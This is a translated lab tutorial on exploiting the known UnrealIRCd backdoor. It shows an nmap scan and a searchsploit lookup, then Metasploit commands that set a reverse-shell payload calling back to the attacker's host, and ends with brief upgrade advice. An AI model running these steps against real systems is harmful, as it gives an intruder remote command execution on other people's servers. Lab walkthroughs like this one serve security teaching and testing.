6-25 Vulnerability Exploitation - irc Backdoor Exploitation

Introduction to irc

IRC is the English abbreviation of Internet Relay Chat, which is generally called Internet Relay Chat in Chinese.It is a network chat protocol pioneered by Finn Jarkko Oikarinen in 1988.After ten years of development, more than 60 countries in the world have provided IRC services. The working principle of IRC is very simple. You only need to run the client software on your PC, and then connect to an IRC through the Internet using the IRC protocol.on the server.At this time, you can chat through irc, which is characterized by very fast speed, almost no delay when chatting, and only occupies a small bandwidth resource, making the speed faster.All users can chat or whisper about a topic in a place called a "Channel".Each IRC user has a Nickname (nickname) to distinguish different users.

By default, the irc server runs on port 6667.

Detect target irc

Use nmap -sV -p 6667 IP address to detect the target irc version information

nmap -sV -p 6667 192.168.42.137

You can see that the target version information is quickly detected

msf exploits irc backdoor

Use searchsploit to find available POCs

searchsploit UnrealIRCd

You can see if there is any problem with the current software, we choose Backdoor Command Execution (Metasploit) here to use it

use exploit/unix/irc/unreal_ircd_3281_backdoorshow optionsset payload cmd/unix/reverseshow optionsset lhost 192.168.42.128exploit

Use the module in msf for the irc backdoor connection to connect to the shell.

As you can see, the detection is completed, the session is established, and we can execute any command here

Repair Defense

1. Upgrade the software version

2. Replace other software